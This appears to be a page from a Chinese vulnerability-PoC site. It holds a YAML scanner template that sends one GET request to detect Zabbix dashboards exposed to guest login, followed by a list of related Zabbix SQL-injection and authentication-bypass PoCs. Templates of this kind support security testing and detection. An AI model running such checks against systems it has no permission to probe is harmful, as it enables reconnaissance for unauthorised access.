zabbix-dashboards-access: Zabbix Dashboards Access

漏洞描述

PoC代码[已公开]

id: zabbix-dashboards-access

info:
  name: Zabbix Dashboards Access
  author: pussycat0x,vsh00t
  severity: medium
  verfied: true
  description: |-
    View dashboard with guest login.
  reference:
    - https://www.exploit-db.com/ghdb/5595
    - https://packetstormsecurity.com/files/163657/zabbix5x-sqlxss.txt
  tags: zabbix,unauth
  created: 2023/07/07

rules:
  r0:
    request:
      method: GET
      path: /zabbix/zabbix.php?action=dashboard.list
      headers:
        User-Agent: TNAS
    expression: |
      response.status == 200 && response.body.bcontains(b'Create dashboard') && response.body.bcontains(b'Zabbix SIA')
expression: r0()

相关漏洞推荐

• Zabbix /api_jsonrpc.php SQL 注入漏洞（CVE-2024-36465）
• POC CVE-2024-22120: Zabbix Server - Time-Based Blind SQL injection
• POC CVE-2016-10134: Zabbix - SQL Injection
• POC CVE-2019-17382: Zabbix <=4.4 - Authentication Bypass
• POC CVE-2022-23131: Zabbix - SAML SSO Authentication Bypass
• POC CVE-2022-23134: Zabbix Setup Configuration Authentication Bypass
• POC CVE-2022-26148: Grafana & Zabbix Integration - Credentials Disclosure
• POC CVE-2016-10134: Zabbix SQL Injection Vulnerability
• POC CVE-2022-23131: Zabbix - SAML SSO Authentication Bypass
• POC CVE-2022-23134: Zabbix Setup Configuration Authentication Bypass
• POC CVE-2022-26148: Grafana & Zabbix Integration - Credentials Disclosure
• POC zabbix-default-password: Zabbix Default Password
• POC zabbix-authentication-bypass: Zabbix authentication Bypass